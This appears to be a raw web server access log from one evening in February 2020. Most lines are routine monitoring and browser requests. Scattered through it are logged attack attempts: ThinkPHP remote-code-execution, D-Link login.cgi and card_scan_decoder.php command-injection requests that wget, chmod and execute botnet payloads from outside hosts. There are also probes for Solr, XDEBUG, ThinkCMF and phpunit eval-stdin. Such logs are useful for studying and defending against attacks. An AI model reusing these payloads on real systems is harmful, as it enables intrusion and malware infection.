2.135.133.131 - - [02/Feb/2020:21:57:09 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
45.143.220.189 - - [02/Feb/2020:21:57:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.43"
212.91.246.72 - - [02/Feb/2020:21:57:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:21:58:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:21:59:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:00:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.143.220.189 - - [02/Feb/2020:22:01:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.43"
49.235.146.76 - - [02/Feb/2020:22:01:18 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:01:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:02:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:03:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.22.123.117 - - [02/Feb/2020:22:04:17 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:04:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:05:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:06:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.18.17.34 - - [02/Feb/2020:22:06:37 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
42.117.35.43 - - [02/Feb/2020:22:06:41 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://scan.casualaffinity.net/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:07:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:08:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.82.140.154 - - [02/Feb/2020:22:08:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
197.51.133.234 - - [02/Feb/2020:22:08:33 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:09:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:10:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:11:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:12:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:13:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.143.220.189 - - [02/Feb/2020:22:13:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.43"
89.148.198.151 - - [02/Feb/2020:22:14:24 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:14:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:15:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:16:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:17:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.113.211.238 - - [02/Feb/2020:22:17:38 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
1.53.26.59 - - [02/Feb/2020:22:18:03 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:18:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.34 - - [02/Feb/2020:22:18:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:22:19:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:20:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.50.26.198 - - [02/Feb/2020:22:20:48 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
138.118.100.152 - - [02/Feb/2020:22:20:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
218.235.187.9 - - [02/Feb/2020:22:20:59 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:21:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.56.46.16 - - [02/Feb/2020:22:22:26 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:22:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.34 - - [02/Feb/2020:22:22:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
188.227.58.124 - - [02/Feb/2020:22:23:04 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
43.225.169.128 - - [02/Feb/2020:22:23:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:22:23:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:24:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.33 - - [02/Feb/2020:22:24:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
5.101.0.209 - - [02/Feb/2020:22:25:09 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:22:25:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.101.0.209 - - [02/Feb/2020:22:25:50 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.101.0.209 - - [02/Feb/2020:22:25:50 +0100] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
102.40.92.187 - - [02/Feb/2020:22:26:08 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://fksdjfaksj321bots.mybiadboats.xyz/thinkphp -O .d41 ; chmod 777 .d41 ; ./.d41 ThinkPHP.exploit' HTTP/1.1" 404 310 "-" "Unstable/2.0"
189.89.214.76 - - [02/Feb/2020:22:26:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
1.52.6.195 - - [02/Feb/2020:22:26:14 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
5.101.0.209 - - [02/Feb/2020:22:26:26 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:22:26:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.68.246.198 - - [02/Feb/2020:22:26:57 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.123.4.234/Dlinkrep.sh%20-O%20-%3E%20/tmp/kh;Dlinkrep.sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
182.138.154.218 - - [02/Feb/2020:22:27:21 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:27:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:28:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.14.210.73 - - [02/Feb/2020:22:29:14 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [02/Feb/2020:22:29:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
14.232.142.112 - - [02/Feb/2020:22:29:30 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Feb/2020:22:30:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:31:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:32:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.73.215.171 - - [02/Feb/2020:22:32:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
183.80.89.52 - - [02/Feb/2020:22:33:01 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:33:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.54.59.104 - - [02/Feb/2020:22:34:09 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:34:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.91.82.246 - - [02/Feb/2020:22:34:46 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:35:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:36:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:37:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:38:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.67.223.231 - - [02/Feb/2020:22:38:56 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:39:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.80.243.138 - - [02/Feb/2020:22:39:37 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
5.96.237.174 - - [02/Feb/2020:22:40:21 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 342 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
212.91.246.72 - - [02/Feb/2020:22:40:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:41:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.34 - - [02/Feb/2020:22:41:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:22:42:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:43:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:44:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.73.215.171 - - [02/Feb/2020:22:44:54 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.143.220.189 - - [02/Feb/2020:22:44:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.43"
178.73.215.171 - - [02/Feb/2020:22:45:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:22:45:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.117.244.176 - - [02/Feb/2020:22:45:28 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:46:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.54.54.117 - - [02/Feb/2020:22:47:11 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
151.72.206.126 - - [02/Feb/2020:22:47:18 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [02/Feb/2020:22:47:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.150.26.14 - - [02/Feb/2020:22:47:54 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:48:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:49:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:50:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:51:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:52:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
5.79.244.102 - - [02/Feb/2020:22:52:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.143.220.189 - - [02/Feb/2020:22:53:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "libwww-perl/6.43"
212.91.246.72 - - [02/Feb/2020:22:53:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.204.218.139 - - [02/Feb/2020:22:53:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
42.117.137.85 - - [02/Feb/2020:22:53:57 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:54:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:55:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.193.219.42 - - [02/Feb/2020:22:55:47 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:22:56:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
50.253.33.146 - - [02/Feb/2020:22:56:51 +0100] "POST /editBlackAndWhiteList HTTP/1.1" 404 326 "-" "ApiTool"
212.91.246.72 - - [02/Feb/2020:22:57:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.35 - - [02/Feb/2020:22:57:32 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Feb/2020:22:58:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:22:59:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:00:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:01:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:02:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:03:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.118.121.248 - - [02/Feb/2020:23:03:58 +0100] "GET / HTTP/1.1" 200 1229 "https://dav.kz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
46.118.121.248 - - [02/Feb/2020:23:03:59 +0100] "GET / HTTP/1.1" 200 1229 "https://dav.kz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
46.118.121.248 - - [02/Feb/2020:23:03:59 +0100] "GET / HTTP/1.1" 200 1229 "https://dav.kz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
212.91.246.72 - - [02/Feb/2020:23:04:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.113.229.235 - - [02/Feb/2020:23:04:30 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://scan.casualaffinity.net/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
212.91.246.72 - - [02/Feb/2020:23:05:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Feb/2020:23:06:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.210.39.125 - - [02/Feb/2020:23:07:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.101.0.209 - - [02/Feb/2020:23:07:06 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [02/Feb/2020:23:07:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.33 - - [02/Feb/2020:23:08:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
